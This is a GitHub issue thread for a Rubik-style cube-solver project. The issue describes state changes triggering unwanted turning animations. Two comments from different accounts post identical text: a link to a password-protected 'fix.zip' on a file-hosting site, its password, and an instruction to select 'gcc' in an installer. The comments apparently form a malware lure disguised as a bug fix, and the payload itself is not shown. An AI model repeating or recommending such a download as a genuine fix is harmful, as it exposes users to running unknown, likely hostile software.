### ISSUE TITLE
Fix cube handler causing unwanted turns

### ISSUE THREAD

**Issue by justinfernald** [willgarrett610/ivy-cube-solver#10]
In strange scenarios, the cube will just run the turning animation. This will occur from state changes. There is some sloppy code to help prevent this but it doesn't stop all scenarios. The sloppy code should be removed and switched for a more consistent pattern.

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
